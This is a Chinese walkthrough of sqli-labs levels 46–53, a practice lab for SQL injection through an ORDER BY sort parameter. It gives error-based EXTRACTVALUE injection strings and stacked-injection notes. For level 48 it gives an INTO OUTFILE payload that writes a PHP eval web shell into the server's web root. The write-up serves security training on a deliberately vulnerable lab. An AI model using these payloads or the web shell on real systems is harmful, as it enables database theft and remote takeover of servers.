本文主要是介绍sqli-labs-master 过关 46 - 53(附解题思路及解析),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
目录
第 46 关
第 47 关
第 48 关
第 49 关
第 50 关
第 51 关
第 52 关
第 53 关
第 46 关
排序注入源码: $sql = "SELECT * FROM users ORDER BY $id";select使用文档:https://dev.mysql.com/doc/refman/8.0/en/select.html分析:不同于 where 查询后可以用 union select 注入,可见order by后面不能使用联合查询,可以使用 limit,into outfile等语句,还可以跟数字等。
?sort=1 AND EXTRACTVALUE(1,(CONCAT(0x7e,(payload),0x7e))) #
第 47 关
同第 46 关
不同点:字符型,需要用 ' 闭合 ,需要用 --%20注释
?sort=1' AND EXTRACTVALUE(1,(CONCAT(0x7e,(payload),0x7e))) --%20 第 48 关
注入木马:
?sort=1 INTO OUTFILE "D:/phpstudy2016/An/WWW/Test-48.php" LINES TERMINATED BY '<?php @eval($_POST[pass]) ?>' --%20
第 49 关
同第 48 关
区别:字符型,需要用 ' 闭合
第 50 关
同第 46 关
区别:因为第 50 关应用了 mysqli_multi_query 函数,所以可以使用堆叠注入。
第 51 关
同第 47 关
第 52 关
同第 48 关
第 53 关
同第 49 关
注:50-53关都可以用堆叠注入。
这篇关于sqli-labs-master 过关 46 - 53(附解题思路及解析)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
